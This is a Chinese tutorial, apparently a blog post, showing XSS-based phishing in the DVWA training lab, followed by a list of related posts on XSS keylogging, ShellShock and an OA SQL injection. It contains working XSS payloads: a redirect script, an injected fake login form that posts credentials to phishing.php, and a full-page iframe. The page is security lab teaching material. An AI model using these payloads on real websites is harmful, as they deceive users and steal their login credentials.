实验环境:

  • PHPstudy
  • 火狐浏览器
  • DVWA靶场

模拟实验:

重定向钓鱼

把当前页面重定向到一个钓鱼页面,例如重定向到百度,代码如下:

<script>document.location.href="http://www.baidu.com"</script>

HTML 注入式钓鱼

使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中。该段代码会在正常页面中嵌入一个 Form 表单。

<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="phishing.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>

iframe 钓鱼

这种方式是通过 标签嵌入远程域的一个页面实施钓鱼。

<iframe src="http://www.baidu.com" height="100%" width="100%"</iframe>
iframe 钓鱼

将构造好的 Flash 文件传入服务器,在目标网站用 或 标签引用即可。

高级钓鱼技术

注入代码劫持 HTML 表单、使用 JavaScript 编写键盘记录器等。

漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法相关推荐

  1. 漏洞复现篇——利用XSS漏洞实现键盘记录

    实验环境: PHPstudy 火狐浏览器.IE DVWA靶场 实验准备: 在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("k ...

  2. LINUX漏洞复现篇之ShellShock漏洞

    简介 ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞 在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bas ...

  3. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  4. 利用xss漏洞结合xss平台实现社工钓鱼

    本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...

  5. 【网络安全】如何使用ppmap检测和利用XSS漏洞

    关于ppmap ppmap是一款基于Go开发的漏洞扫描器/漏洞利用工具,该工具能够通过在全局上下文中检查特定变量来扫描.检测和利用XSS漏洞.该工具目前只能利用已知Gadget(可能支持部分自定义开发 ...

  6. html %3c 不给转义,八个无法利用XSS漏洞的场景

    ☝☝ 相信有很多的小盆友们曾经发现过一些疑似存在XSS漏洞的站点,但又无法完全证明这个漏洞是可以被利用的.此时的你可能处于怀疑状态,也有可能你已经验证到一半了,严重怀疑其有精神病(XSS漏洞)的情况. ...

  7. ms08_067,ms10_046漏洞复现与利用

    ms08_067,ms10_046漏洞复现与利用 一:ms08_067 主机扫描 通过nessus扫描网段内存活的主机,发现192.168.206.142该靶机并且时xp而且开启了445端口,考虑使用 ...

  8. 利用XSS漏洞实现键盘记录器

    利用XSS漏洞实现键盘记录器 本实验以反射性的XSS漏洞为例 实验环境:dvwa靶机(ip:192.168.135.140) kali linux(ip:192.168.135.138) 1.首先开启 ...

  9. 怎样利用XSS漏洞在其它网站注入链接?

    怎样利用XSS漏洞在其它网站注入链接? 什么是XSS攻击 怎样利用XSS漏洞在别人网站注入链接 XSS攻击注入的链接有效果吗? 对搜索结果的潜在影响有多大? 作弊和黑帽SEO 黑帽SEO是相对于白帽而 ...

最新文章

  1. php error_reporting 详解
  2. 元旦福利 | Python、机器学习、TensorFlow 图书送一波
  3. 什么是稀疏矩阵算法?
  4. 测试优惠券要怎么写测试用例?
  5. python考试题库 pcap_使用Python修改PCAP
  6. 三分钟学会缓存工具DiskLruCache
  7. python traceback most recent_pyspider启动错误: Traceback (most recent call last):
  8. 【Java】从键盘中输入一个值,在数组中查找该值的索引并输出
  9. brew 基本使用方法
  10. 广西民族博物馆真好玩
  11. Matlab批量读取csv、txt、prn等文件
  12. windows 端口被System进程占用怎么解决?
  13. Unity2D游戏制作常用方法
  14. HBase Java API操作数据库
  15. STM32G0系列的启动配置与程序下载说明
  16. 天道不一定酬勤,深度思考比勤奋更重要
  17. LTE小区搜索-物理小区ID和同步信号PSS、SSS
  18. 【第十二届蓝桥杯国赛真题】2021年第12届蓝桥杯JAVA B组国赛真题
  19. Liquibase集成达梦数据库、Activiti集成达梦数据库
  20. unity-shader-屏幕空间反射

热门文章

  1. matlab 结构体 单元数组,matlab结构体、数组和单元数组类型的创建
  2. gradle-8.0-all 快速下载百度网盘下载
  3. 解决谷歌游览器登陆出现不安全弹窗,而无法登陆问题
  4. Vue cli版本更新,全局安装指定版本Vue cli3.x并继续使用Vue-cli2.x
  5. 文件服务器 导出权限,肿么导出共享文件夹的共享权限清单
  6. 数据结构树状结构链式二叉树
  7. 浪潮服务器插独立显卡不能进入系统,服务器如何安装系统
  8. python SQL--mysql调优笔记(一)
  9. 牛客竞赛题库 选村长
  10. google 重领浪潮之巅